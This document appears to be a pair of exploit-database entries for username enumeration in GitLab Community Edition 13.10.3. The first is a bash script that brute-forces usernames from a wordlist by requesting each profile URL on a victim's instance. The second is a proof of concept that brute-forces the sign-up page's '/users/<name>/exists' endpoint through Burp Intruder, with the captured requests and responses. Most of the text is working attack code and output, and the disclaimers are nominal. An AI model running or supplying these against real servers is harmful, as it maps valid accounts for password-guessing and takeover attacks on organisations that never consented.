# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 #!/bin/bash #Colors RED='\033[38;5;196m' GREEN='\e[38;5;47m' NC='\033[0m' BOLD='\e[1m' PINK='\e[38;5;198m' Italic='\e[3m' BBlue='\e[44m' YELLOW='\033[0;33m' clear echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}" echo -e " ${BOLD}Version 1.0${NC}\n" echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n" echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only" echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the" echo -e "right permission is totally on your own risk.\n${NC}" echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}" echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo "" # Usage usage() { echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url --userlist ${NC}\n" echo -e "${Italic}PARAMETERS:${NC}" echo -e "-------------" echo -e "-u/--url The URL of your victim's GitLab instance" echo -e "--userlist Path to a username wordlist file (one per line)" echo -e "-h/--help Show this help message and exit" echo -e "\n" echo -e "${Italic}Example:${NC}" echo -e "-------------" echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt" } #check for params args=("$@") URL="" user_list="" for (( i=0; i < $#; i++)) { case ${args[$i]} in --url | -u) #GitLab's URL URL=${args[$((i+1))]} ;; --userlist) #Username wordlist user_list=${args[$((i+1))]} ;; -h | --help | "") #Help Menu usage exit 0 ;; esac } ## checking the mandatory parameter (URL) if [ -z "$URL" ] then usage echo "" echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}" exit 0 fi # User Enumeration Function enumeration(){ while IFS= read -r line do echo "LOOP" HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line) echo $HTTP_Code #echo "\n" if [ $HTTP_Code -eq 200 ] then echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!" #check the connection elif [ $HTTP_Code -eq 000 ] then echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!" exit 0 fi done < "$user_list" } # Main enumeration ---------------- # Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up]. DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk. STEPS: The required steps for this purpose are as follows: 1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username 2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow: ---------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /users/testuser/exists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/users/sign_up X-CSRF-Token: X-Requested-With: XMLHttpRequest Connection: close Cookie: experimentation_subject_id=; known_sign_in=; _gitlab_session= ---------------------------------------------------------------------------------------------------------------------------------------------------------------- * note that the tested username (testuser) is in URI 3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter. 4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples: -------------------------------------------The following response belongs to a valid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:52:44 GMT Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"8063e5a51719c58189c7d5209a5f37b3" Page-Title: GitLab Set-Cookie: _gitlab_session=; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F X-Runtime: 0.221557 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":true} -------------------------------------------The following response belongs to an invalid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:55:34 GMT Content-Type: application/json; charset=utf-8 Content-Length: 16 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"e39f603a5ebcff23859d200f9c9dc20f" Page-Title: GitLab Set-Cookie: _gitlab_session=; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0 X-Runtime: 0.033046 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":false}